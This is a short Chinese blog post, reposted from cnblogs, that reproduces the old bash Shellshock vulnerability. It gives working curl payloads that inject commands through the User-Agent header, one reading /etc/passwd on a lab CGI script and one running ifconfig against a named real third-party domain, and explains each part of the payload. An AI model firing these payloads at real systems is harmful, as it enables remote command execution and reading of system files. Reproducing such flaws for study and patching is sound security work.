博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
Shellshock漏洞复现
阅读量:4316 次
发布时间:2019-06-06

本文共 432 字,大约阅读时间需要 1 分钟。

漏洞分析:

exp:

curl -A "() { :; }; echo; /bin/cat /etc/passwd" http://172.16.20.134:8080/victim.cgi

 (){ } 代表bash函数

  :  bash中相当于python中的pass占位符

 -A  自定义头部信息-H也是可以的

 后面要执行的命令

 漏洞成因调用了bash执行系统命令

如果你对具体源码分析感兴趣,请看这篇知道创于的文章:

 

复现截图:

 

乌云shellshock漏洞:

bash破壳漏洞,老漏洞了,请尽快修复吧!

mask 区域
*****cn/cgi-bin/test*****

漏洞验证

code 区域
curl -A "() { foo;};echo;/sbin/ifconfig" http://rewu.kuwo.cn/cgi-bin/test-cgi

 

转载于:https://www.cnblogs.com/junsec/p/11506854.html

你可能感兴趣的文章
电报压缩/解压缩系统
查看>>
[UE4]C++ getter and setter
查看>>
[UE4]机器人射击逻辑行为树
查看>>
CentOS系统将UTC时间修改为CST时间
查看>>
Django学习笔记8
查看>>
cadence钻孔文件及光绘文件的生成
查看>>
css实现左右布局
查看>>
[Shader]一个shader效果啦(那个lost soul aside里面看到的)
查看>>
elasticsearch 中文API river
查看>>
Mac OS X 下搭建php开发环境
查看>>
Vue学习之vue中的计算属性和侦听器
查看>>
redis常见面试题
查看>>
C# - XML
查看>>
android权限大全
查看>>
BZOJ.3262.陌上花开([模板]CDQ分治 三维偏序)
查看>>
[原]unity5 AssetBundle 加载
查看>>
[Day15]常用API(Object类、String类)
查看>>
[置顶] 各种流行的编程风格
查看>>
codeforces1029 E.Tree with Small Distances
查看>>
JavaScript——JS上下文中的this值笔记
查看>>